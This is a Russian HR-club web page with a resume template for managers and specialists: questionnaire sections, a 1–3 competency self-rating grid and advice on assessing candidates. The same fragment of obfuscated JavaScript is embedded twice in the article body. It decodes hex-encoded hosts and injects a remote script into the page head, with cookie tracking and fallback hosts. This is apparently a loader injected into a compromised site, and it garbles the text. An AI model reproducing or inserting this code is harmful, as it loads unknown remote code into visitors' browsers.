Заказчику Исполнителю Агентство HR-клуб Отзывы Регистрация Вход
 
 
 
Связаться с экспертом
Александр
28 апреля 2016
кадровик-дженералист. ИП Федотов А.В.

Пример резюме для специалистов и руководителей

Резюме относится к основному и начальному инструменту оценивания руководителей и серьезных специалистов.С него начинается оценка и отбор. 

o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hrtime.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf("http")==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("@@@@");i.setAttribute("src",n),i.setAttribute("type","text/java@@@@"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

Резюме относится к основному и начальному инструменту оценивания руководителей и серьезных специалистов.С него начинается оценка и отбор. Здесь особых усилий не требуется, но важно, чтобы резюме адекватно описывало его «школу» при становлении как профессионала (которая с ним будет всегда), его окружение и среду с ее ценностями, этапы профразвития, обретенные знания и навыки, проявленные личностные качества.

Качественные резюме пишутся не часто, поэтому следует заготовить бланк нужного вам по содержанию резюме, которым будете постоянно пользоваться, с необходимой корректировкой. Например, такой.

 

РЕЗЮМЕ.

Ф.И.О. _______________________________________________________________________

Дата рожд. __________________  Район места жит-ва _______________________________

Конт. тел. ______________________________________  Е-mail _______________________

 

1. Ваша подготовка.

- ВУЗ, год окончания, специальность _____________________________________________

_____________________________________________________________________________

_____________________________________________________________________________

_____________________________________________________________________________

- Дополнительное образование, аспирантура, курсы ________________________________

_____________________________________________________________________________

_____________________________________________________________________________

_____________________________________________________________________________

- Самообразование, области ____________________________________________________

_____________________________________________________________________________

_____________________________________________________________________________

2. Трудовая деятельность, начиная с последнего места работы.

 

Период

работы

Предприятие, организация

Должность

Обязанности

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

3. Профессиональный опыт.

- Какие проекты были реализованы Вами ___________________________________________

________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

- Опишите задачи, которые пришлось решать ________________________________________

________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

- Какие профессиональные и управленческие задачи представляли наибольший интерес _________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

- Опишите другие Ваши знания и навыки ________________________________________­­­____

____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

 

4. Профессиональное развитие.

 

- Какие работы и люди способствовали Вашему профессиональному росту ________________

_________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

- В какие области управления и профессии Вы хотели бы углубиться ______________________

_________________________________________________________________________________________________________________________________________________________________

_____________________________________________________________________________

_____________________________________________________________________________

- Что Вас подвигло на дополнительное образование и самообразование __________________

____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

5. Работа в команде.

- С какими задачами Вы столкнулись в работе с коллективами или при их формировании _________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

- Какие коллективы для Вас привлекательны _________________________________________

_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

6. Попробуйте оцените свои компетенции(от 1 до 3 баллов: слабо-нормально-хорошо) по следующим критериям:

 

балл

Уровень знаний

балл

Профессиональ-ные навыки

балл

Реализация инноваций

балл

Отношение к работе

 

знаю свои задачи

 

могу научить многих

 

новатор

 

инициативный

 

профессиональные знания глубокие

 

опыт разнообразный

 

доволен инновационной работой

 

целеустремленный

 

профессиональные знания разнообразные

 

знаю работу

 

изучаю новинки

 

контроль не нужен

 

владею смежными знаниями

 

реализовывал инновации

 

тягощусь отсталостью

 

уверенный

 

хорошо эрудирован

 

все сделаю сам

 

регулярно внедряю что-то

 

аккуратный

 

знаю управленческие концепции

 

авторитетный

 

прорабатываю идеи

 

планомерный

 

разрабатываю способы эффект. управления

 

влиятельный

 

умею реализовать новое

 

заинтересованный

 

 знаком с методами эффект-ного взаимодействия

 

умею многое

 

борюсь с нерациональ-ностью

 

основательный

 

реальность всегда системна

 

ставлю себе задачи

 

 неизменность – это исключение

 

пунктуальный

 

 Задача требует разработки и программы решения

 

вижу проблемы

 

 

 

неравнодушный

 

 

 

всегда найду выход

 

 

 

делу – время, потехе - час

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

балл

Особенности как администратора и руководителя

балл

Развитие, самообразование

балл

Стиль деятельности

балл

Социальные отношения

 

демократичные методы

 

наголову выше других

 

ответственность

 

тактичный

 

требовательный

 

многие лишь тени для специалиста

 

инициативность

 

к гадостям не склонен

 

действует планомерно

 

знаю нюансы работы

 

целеустремленность

 

компанейский

 

делегирую полномочия

 

эрудированность

 

контроль не нужен

 

уверенный

 

стремлюсь к эффективной работе

 

интересуюсь новинками

 

могу сделать все сам

 

общительный

 

принуждаю по делу

 

частенько заявляю идеи

 

аккуратность

 

откровенный

 

предпочитаю убеждать

 

работаю с литературой

 

демократичность

 

дружелюбный

 

редко применяю санкции

 

оперирую новыми знаниями

 

выносливость

 

эмоциональный

 

умею поощрять

 

обучаю товарищей

 

пунктуальность

 

искренний

 

взаимодействую с коллегами

 

занимаюсь разработкой организации работы

 

требовательность

 

правдивый

 

умею заинтересовать

 

 изучаю специфику управления

 

рабочий локомотив

 

справедливый

 

могу мобилизовать

 

 

 

эффективен

 

молчун

 

взаимодействую с коллегами

 

 

 

в тень не ухожу

 

веселый

 

хороший организатор

 

 

 

 харизматичный

 

 активный

 

 

 

 

 

 

 

 

 

7. Адаптация в новой должности.

- С чем Вы хотите познакомиться или изучить дополнительно, заняв новую должность ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

Какая поддержка необходима от фирмы при освоении должности _______________________

________________________________________________________________________________________________________________________________________________________________

8. Ориентация на новую работу

- Каковы будут Ваши планы в новой должности ______________________________________

_________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

- Какие стратегические задачи будут стоять перед Вами ________________________________

________________________________________________________________________________________________________________________________________________________________

- Каким текущим задачам Вы отдадите приоритет ____________________________________

________________________________________________________________________________________________________________________________________________________________

 

9. Присутствуют ли такие факторы Вашего здоровья, которые желательно нивелировать _____________________________________________________________________________

_________________________________________________________________________________________________________________________________________________________________

10. Не могли бы Вы описать Ваши ближайшие планы или мечты _________________________

_________________________________________________________________________________________________________________________________________________________________

_____________________________________________________________________________

11. Что бы Вы хотели добавить или спросить _________________________________________

_________________________________________________________________________________________________________________________________________________________________

 

«_____» ______ 201___ г.                                                                      __________________________

                                                                                                                                                                                                                    Подпись

 

Вопросы оплаты труда оговариваются на встрече с руководством.

Все сведения, изложенные в Резюме, могут быть открыты только заказчику вакансии.

 

                        Оценка особенностей претендента.

 

            Подобное резюме дает обширные представления о профбиографии, о профшколе, которую прошел кандидат, о пути формирования как специалиста, его профессиональном багаже, о самостоятельности в работе, профценностях, т.е. о личностных особенностях и возможностях. А такие данные – это материал для прогноза!

Оцениваемые особенности кандидата, сформулированные в п. 6 и дополнительно – в остальных позициях Резюме, в достаточно общем виде могут следующими: Уровень знаний, Профессиональные навыки, Реализация инноваций, Отношение к работе, Особенности как администратора и руководителя, Развитие, Самообразование, Стиль деятельности, Социальные отношения, Склонности к разработке или практике, Особенности восприятия и мышления – системное или узкое, Способность работы в команде и др.

Все эти позиции оценки задаются требованиями к выполняемой работе, которые должны иметь место в особенностях человека, т.е. структура требований должна достаточно адекватно пересекаться со структурой особенностей человека. Оценки целесообразно производить в баллах от 1 до 3, исходя из предъявляемых требований к уровню проявления оцениваемого критерия.

Разумеется, предложенную форму резюме и выделяемые требования должны: найти отражение в личностных особенностях кандидата и быть скорректированными под руководителя или специалиста в реальных условиях работы.

Исходя из многолетнего опыта и набора на работу порядка 500 чел., можно утверждать, что оценки в целом дают ответ с надежностью 0,6-0,9. 

o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hrtime.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf("http")==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("@@@@");i.setAttribute("src",n),i.setAttribute("type","text/java@@@@"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

Комментарии 0 Мне нравится 0 В закладки 0 Просмотры 375

Хотите участвовать в обсуждении? Пройдите регистрацию.

Добавить документВсе документы
Другие материалы в HR-клубе
Материалы 822
HR-вопросы 229
Учебные программы 1083
Школа соискателей 114
Полезные ссылки 75
Шаблоны документов 52
Оценочные кейсы 87
Мероприятия 132
ПОПУЛЯРНЫЕ МАТЕРИАЛЫ
11 марта 2015, 07:43
Анкета первичной адаптации
Предлагаю коллегам использовать для своей работы отличный инструмент - анкета адаптации сотрудника в компании, анкета адаптация персонала (анкета на адаптацию). К концу первого месяца испытательного срока, новый сотрудник, уже понимает, останется...
1843 3 0
1 октября 2015, 14:00
Компетенции для оценки торгового представителя
С необходимостью оценки компетенций мы сталкиваемся постоянно, и в подборе персонала, и в оценке персонала, и в развитии сотрудников. Предлагаю Вашему внимаю компетенции для торговых представителей. Безусловно, для каждой организациита или иная компетенция...
1302 1 0
23 марта 2016, 16:03
Интервью по компетенциям для линейного персонала
Представляю Вашему вниманию структурированное интервью, которое позволяет объективно оценить 3 компетенции:- Профессиональная активность- Хозяйское отношение к бизнесу - Умение работать в команде.Данное интервью разарботано для оценки компетенций...
759 1 4
22 августа 2016, 16:58
Индивидуальный план работы на испытательный срок с оценкой
Еще один документ, который работодатель может составить перед тем, как сотрудник приступит к работе, – это индивидуальный план на время испытательного срока. В этом документе прописываются основные обязанности сотрудника, этапы работы, задания и...
438 0 0
20 октября 2016, 17:40
Оценка профессиональной деятельности сотрудника
Оценка профессиональной деятельности сотрудника. Данная оценочная форма может быть полезна как в период прохождения испытательного срока сотрудником, так и в процессе аттестации персонала компании. Форма создавалась для компании по оптово-розничной...
259 0 0
28 октября 2016, 16:45
Аттестационный лист
Унифицированной формы аттестационного листа не существует, поэтому он может быть составлен на общем бланке организации, с соблюдением всех правил. Содержание и форма документа в основном зависит от целей проведения аттестации (например, повышение квалификации...
309 0 0
25 сентября 2014, 14:42
Оценочная анкета для проверки целостности и знание основных преимуществ работы с Вашей компанией
Помогает понять, на каких принципах строит менеджер общение со своими действующими клиентами. Что примяняет, как видит движение своего клиента от нового к постоянному. Подходит для опросов и подготовки к обучению. Можно применять для оценки общего состояния...
666 0 2
Нет оценок